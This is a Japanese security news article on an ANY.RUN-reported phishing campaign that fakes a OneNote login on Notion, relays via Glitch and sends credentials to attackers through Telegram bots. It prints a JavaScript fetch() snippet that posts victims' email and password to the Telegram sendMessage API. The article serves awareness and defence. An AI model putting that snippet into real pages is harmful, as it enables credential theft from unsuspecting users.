近年、クラウドサービスを悪用したフィッシング攻撃が巧妙化しています。2025年5月、サイバーセキュリティ企業ANY.RUNは、Microsoft OneNoteの偽ページとTelegramのボット機能を用いてリアルタイムで認証情報を盗み出す新たな攻撃手法を報告しました。攻撃者は正規のGoogleフォームやNotion、Glitchなどのインフラを駆使し、被害者の警戒心を巧みにすり抜けています。
目次
攻撃の詳細:偽OneNoteログイン画面とTelegramの連携
ANY.RUNが分析した事例では、フィッシングページはMicrosoft OneNoteのログイン画面を模倣したもので、正当なNotionを利用してホスティングされていました。
画像:ANY.RUN
被害者がOutLookでログインを選択し、IDやパスワードを入力すると、ログインはできず入力された情報は即座にTelegramボットを通じて攻撃者のチャットに送信されます。
画像:ANY.RUN
最後に一連の流れの正当性を担保するために最後、公式の Microsoft OneNote ログイン ページにリダイレクトされます。
さらに、同一攻撃者は複数のTelegramボットを使い分けており、通信の追跡や分析を困難にしています。
TelegramのボットAPIによる即時送信
この攻撃手法の中核には、テレグラム(Telegram)のボットAPIの利用があります。フィッシングページに埋め込まれたJavaScriptコードが、被害者の入力情報をボットのsendMessageエンドポイント経由で送信します。以下はその一例です
fetch(`https://api.telegram.org/bot${BOT_TOKEN}/sendMessage`, {
method: 'POST',
body: JSON.stringify({
chat_id: CHAT_ID,
text: `Email: ${email}\nPassword: ${password}`
}),
headers: {
'Content-Type': 'application/json'
}
});
こ
のような実装により、攻撃者はバックエンドサーバを介さず、直接Telegramを利用して情報を受け取れるため、サーバ側のログやIP追跡から逃れやすくなります。
また、使用されたドメイン構成も注目に値します。多くは以下のような流れで構成されていました
-
Notion(フィッシングUIのホスティング)
-
Glitch(中継的な動作やリダイレクト)
-
Telegram(最終的なデータ送信先)
誰でも実行可能な簡便性と追跡困難性
この攻撃手法は、サイバー犯罪の敷居を著しく下げるものであると同時に、従来のフィッシング対策を回避する高度な設計が施されています。特筆すべきは以下の点です:
-
Telegramは正規サービスであるため、セキュリティソリューションによる通信検出が難しい
-
攻撃者が専用のC2(コマンド&コントロール)サーバを構築せずに済む
-
NotionやGlitchなどの信頼されたサービスの使用により、ドメインベースのフィルタリングが効きにくい
このように、最小限の技術力でも大きな影響を与えることができるため、今後類似の攻撃が多発する可能性があります。
類似事例:ClickFIX攻撃との共通点
このTelegramボットを用いた手法は、以前確認された「ClickFIX」攻撃とも類似しています。ClickFIXでは、偽ページを通じてユーザーにPowerShellコマンドの実行を促し、RAT(リモートアクセス型トロイ)をインストールさせるものでした。いずれの事例も、ユーザーの信頼と誤認を突き、行動を誘導する新たなソーシャルエンジニアリング 手法が駆使されています。
参照
https://any.run/cybersecurity-blog/adversary-telegram-bot-abuse/
